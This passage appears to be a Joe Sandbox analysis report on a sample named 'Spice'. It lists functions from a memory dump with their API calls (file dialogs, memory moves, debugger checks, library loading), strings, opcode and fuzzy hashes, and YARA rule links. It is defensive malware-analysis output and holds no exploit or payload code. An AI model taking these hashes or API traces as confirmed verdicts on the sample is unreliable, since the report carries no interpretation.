Instruction Fuzzy Hash: 9E916D71910219AFCF18EFA4CC919EEB7B4FF44314F14556AF81ABB2A1EB309A05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E84AB2: __fread_nolock.LIBCMT ref: 00E84AD0

_wcscmp.LIBCMT ref: 00ED9DE1
_wcscmp.LIBCMT ref: 00ED9DF4

Strings

FILE, xrefs: 00ED9D2D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 31c6d9e18c7ee0d7d4c4e4ec65087b3b7de6ea0b3855b22b4fa4b2b2019191cd
Instruction ID: c9ebe7ba1c35a73b6aa7b991d912ccbb0a82d0eb14c394a89d8c0fea00b5a48d
Opcode Fuzzy Hash: 31c6d9e18c7ee0d7d4c4e4ec65087b3b7de6ea0b3855b22b4fa4b2b2019191cd
Instruction Fuzzy Hash: 9C41F872A4021ABADF21EAE4CC45FEF7BFDDF45714F00046AF904BB281E67199058765

Uniqueness

Uniqueness Score: -1.00%

Function 00E831BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EC032B
GetOpenFileNameW.COMDLG32(?), ref: 00EC0375

Part of subcall function 00E90284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E82A58,?,00008000), ref: 00E902A4

Part of subcall function 00E909C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E909E4

Strings

X, xrefs: 00EC0343

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: dbc62daad0ae2ff76957bfbe22fce628f00f9b9246b78c2f97ed7c4a44a2dd06
Instruction ID: 976d4c6913327ad081c0d32efa991dc301afebb57f644c1962ecd32626ac3838
Opcode Fuzzy Hash: dbc62daad0ae2ff76957bfbe22fce628f00f9b9246b78c2f97ed7c4a44a2dd06
Instruction Fuzzy Hash: DC21C671A002989BCF41DFD4D805BEE7BFC9F49704F00405AE408B7241DBB55989DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EED1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de7a29f057755198c8263472c6f47e55c391797aaedf91c2d364fee52fffddee
Instruction ID: 40f8a5d21d0b579d084d63a65ab4326d154e934816c7b201eb563bc7fa799d13
Opcode Fuzzy Hash: de7a29f057755198c8263472c6f47e55c391797aaedf91c2d364fee52fffddee
Instruction Fuzzy Hash: 84F13C705083459FC714DF29C984A6ABBE5FF88314F14992DF899AB391D730E945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00E81680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E816DB
_memmove.LIBCMT ref: 00E8174C
_memmove.LIBCMT ref: 00E817B9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 7e161629f256978e0801599d1795c9ec4bd3653011adcda4446e7829245f9baf
Instruction ID: 5723466a381ade5317c528eef0f81c6454b0f811cc750fb4d46bfac317ed3e0c
Opcode Fuzzy Hash: 7e161629f256978e0801599d1795c9ec4bd3653011adcda4446e7829245f9baf
Instruction Fuzzy Hash: 2461DE71600209EBDF049F25D880AAE7BB8FF44310F1591A9EC5DDF294EB31DA61DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E7AAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00E907BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E907EC
Part of subcall function 00E907BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E907F4
Part of subcall function 00E907BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E907FF
Part of subcall function 00E907BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E9080A
Part of subcall function 00E907BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E90812
Part of subcall function 00E907BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9081A

Part of subcall function 00E8FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E7AC6B), ref: 00E8FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E7AD08
OleInitialize.OLE32(00000000), ref: 00E7AD85
CloseHandle.KERNEL32(00000000), ref: 00EB2F56

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 7fa699935e95bac1d3194b2cedf65d314ea3b810e2fb55bd6eaa61d5bf75b891
Instruction ID: f87ca2e83ef9d6ab8c99d7ca0e59e7429ff01f9da7caa55d3ee24db184526016
Opcode Fuzzy Hash: 7fa699935e95bac1d3194b2cedf65d314ea3b810e2fb55bd6eaa61d5bf75b891
Instruction Fuzzy Hash: EB81A8F0908388CEC3A8FF29ED446597EEAEB59334710916AD458D72B2EB306405FF60

Uniqueness

Uniqueness Score: -1.00%

Function 00E859D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E859F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E85A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E85ABB

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 11c6a256dbab9dcc2636d97b9ed2520712b64bea3533c42d82c3b4dff0aededb
Instruction ID: 834a51551708f591e6bc549952a08e255227e149f253593d7c27f03273907ba0
Opcode Fuzzy Hash: 11c6a256dbab9dcc2636d97b9ed2520712b64bea3533c42d82c3b4dff0aededb
Instruction Fuzzy Hash: C2318FB1505705CFC724EF34D8C4697BBE8FB48318F001A6EF99EA2240EB71A944DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E9593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00E95953

Part of subcall function 00E9A39B: __NMSG_WRITE.LIBCMT ref: 00E9A3C2
Part of subcall function 00E9A39B: __NMSG_WRITE.LIBCMT ref: 00E9A3CC

__NMSG_WRITE.LIBCMT ref: 00E9595A

Part of subcall function 00E9A3F8: GetModuleFileNameW.KERNEL32(00000000,00F353BA,00000104,00000004,00000001,00E91003), ref: 00E9A48A
Part of subcall function 00E9A3F8: ___crtMessageBoxW.LIBCMT ref: 00E9A538

Part of subcall function 00E932CF: ___crtCorExitProcess.LIBCMT ref: 00E932D5
Part of subcall function 00E932CF: ExitProcess.KERNEL32 ref: 00E932DE

Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58

RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,?,00000004,?,?,00E91003,?), ref: 00E9597F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3a9f81f3f9c6ddcbc3b15e91766d16e4b9b9810e6f1cfcad9b4bb0cc72c2b6fc
Instruction ID: 7d2c646740ce339d5b3bb3af70a618b46946933c3e21011b4de0f0ae53e572de
Opcode Fuzzy Hash: 3a9f81f3f9c6ddcbc3b15e91766d16e4b9b9810e6f1cfcad9b4bb0cc72c2b6fc
Instruction Fuzzy Hash: 8B01B133241B16EAFE126B349C42B6E32999FD2774F51212BF429BB2E1DE708D4047A1

Uniqueness

Uniqueness Score: -1.00%

Function 00ED92C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00ED92D6

Part of subcall function 00E92F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E99C54,00000000,00E98D5D,00E959C3), ref: 00E92F99
Part of subcall function 00E92F85: GetLastError.KERNEL32(00000000,?,00E99C54,00000000,00E98D5D,00E959C3), ref: 00E92FAB

_free.LIBCMT ref: 00ED92E7
_free.LIBCMT ref: 00ED92F9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: 028a8801029e4003dc66998a1aa99133e25ef4e4514c5246376f5f85a53aeab7
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: BAE012A170560267CE24A5797D80ED777FC8F88755715251EB50AF7643CE24E8428168

Uniqueness

Uniqueness Score: -1.00%

Function 00E75E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 00EAE234

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 4814932df57c998867d540834c26ff2625604ca8184cafd6af584873604398d0
Instruction ID: 6bdfddba14b48c8bc9b935d83966da7a83b06f6a04b98a8d4e2b11be2e7a102d
Opcode Fuzzy Hash: 4814932df57c998867d540834c26ff2625604ca8184cafd6af584873604398d0
Instruction Fuzzy Hash: B1324A70608741DFCB24DF14C494A6AB7E1FF89308F14A55DE88AAB362D735EC45DB82

Uniqueness

Uniqueness Score: -1.00%

Function 00E848B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E848FA

Strings

EA06, xrefs: 00EC08A1

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 65d858c1c55233dc80d8cf5c54c51543b0af55231000e4c2b4f67368049f71a1
Instruction ID: 7f80a3d76a8314edbf64e2a4783cbc906fb27501fc06382fb810c4d5c4b35491
Opcode Fuzzy Hash: 65d858c1c55233dc80d8cf5c54c51543b0af55231000e4c2b4f67368049f71a1
Instruction Fuzzy Hash: 25419FA2A0415A9BDF35AB5488517FF7BE5CB85300F5460B5F88DFB2C6D5218D4083E1

Uniqueness

Uniqueness Score: -1.00%

Function 00EEE139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00EEE20C

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

_wcscpy.LIBCMT ref: 00EEE29B

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 81e04df74ca01ce7e865647e134c7729feb4b0731088612466d04d53e746c0a6
Instruction ID: 7aba95d975b6e8cdddb981a0650218cd60e5b36c06dbd957d431db8c0f8125b8
Opcode Fuzzy Hash: 81e04df74ca01ce7e865647e134c7729feb4b0731088612466d04d53e746c0a6
Instruction Fuzzy Hash: 9F913935A00608DFCB28DF19C5819ADB7E5FF49314B55E05AE85AAF3A2DB30ED41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6818 Relevance: 3.2, APIs: 2, Instructions: 216COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00ED68EC
_memmove.LIBCMT ref: 00ED690A

Part of subcall function 00ED6A73: _memmove.LIBCMT ref: 00ED6B01

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
Instruction ID: b3d312c2e3cb353583cd83a7804354796448ad4e2145606a75869867c83be088
Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
Instruction Fuzzy Hash: 467192716006049FCB249F54C955BAAB7E5EF84328F24E50AE8D93B392CB35AD42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00ED614E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 251895289edad88d1cb58a5c1f69941622c0918037ae4a4ac99a79452beac875
Instruction ID: f50c63ae514c7db62afd63399649b5ae85cd284991e72cc0dc29f8c32a5b98ff
Opcode Fuzzy Hash: 251895289edad88d1cb58a5c1f69941622c0918037ae4a4ac99a79452beac875
Instruction Fuzzy Hash: B341B4B6600209AFDB21EFA4C8819AEB3F8EB44354B10552FE55AA7351EB309A46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED7D6E Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00ED7E96

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
Instruction ID: 48671fb0cd8a66498edbdf816f48390408ca8dd95e6a82907c7edeea408c930d
Opcode Fuzzy Hash: 5494bf0a0b3f304d048f6ad855e7f64c9f1cfdefcb4228e15d96b3c10cbc24cc
Instruction Fuzzy Hash: 3341C8725082099FCB10EFA8D881DBEB7E9EF49344B64549EE5C5B7381EB719D02C760

Uniqueness

Uniqueness Score: -1.00%

Function 00E90E38 Relevance: 3.1, APIs: 2, Instructions: 94libraryCOMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 00E90ED5
LoadLibraryExW.KERNELBASE ref: 00E90EE7

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ChangeCloseFindLibraryLoadNotification
String ID:
API String ID: 1525634188-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 9a62e1a3b4b178efd0fbb4a51784b9d4f19c60742d4f32bdbdcb53977b73680e
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: EA31C471A00109DFDF19DF58C4809A9F7A6FF59304BA49AA5E40AEB251E731EDC1CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E85F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00E85FEF

Part of subcall function 00E9359C: __lock.LIBCMT ref: 00E935A2
Part of subcall function 00E9359C: DecodePointer.KERNEL32(00000001,?,00E86004,00EC8892), ref: 00E935AE
Part of subcall function 00E9359C: EncodePointer.KERNEL32(?,?,00E86004,00EC8892), ref: 00E935B9

Part of subcall function 00E85F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E85F18
Part of subcall function 00E85F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E85F2D

Part of subcall function 00E85240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E8526C
Part of subcall function 00E85240: IsDebuggerPresent.KERNEL32 ref: 00E8527E
Part of subcall function 00E85240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E852E6
Part of subcall function 00E85240: SetCurrentDirectoryW.KERNEL32(?), ref: 00E85366

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E8602F

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 62c6bf591ebf07230410f90ae756849562f36ae3c4e7ed88e70baf7c5709f6a9
Instruction ID: bacf57defc183068df8329fbd609163151870e88488b0c4d05ccd46da0f3140b
Opcode Fuzzy Hash: 62c6bf591ebf07230410f90ae756849562f36ae3c4e7ed88e70baf7c5709f6a9
Instruction Fuzzy Hash: 6911AEB18083099BC720EF68ED0594ABBE9EF88320F00851EF488A32B2DB709545DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00E90FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9593C: __FF_MSGBANNER.LIBCMT ref: 00E95953
Part of subcall function 00E9593C: __NMSG_WRITE.LIBCMT ref: 00E9595A
Part of subcall function 00E9593C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,?,00000004,?,?,00E91003,?), ref: 00E9597F

std::exception::exception.LIBCMT ref: 00E9101C
__CxxThrowException@8.LIBCMT ref: 00E91031

Part of subcall function 00E987CB: RaiseException.KERNEL32(?,?,?,00F2CAF8,?,?,?,?,?,00E91036,?,00F2CAF8,?,00000001), ref: 00E98820

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 226aa43d5965623d4f1cf37bc0c867f209508f6e80f6c076c6c1954f13e93141
Instruction ID: 68281f7cb19232c564915d865f0293d7fe6d925b1d5b6e30d0a258ad48bc2834
Opcode Fuzzy Hash: 226aa43d5965623d4f1cf37bc0c867f209508f6e80f6c076c6c1954f13e93141
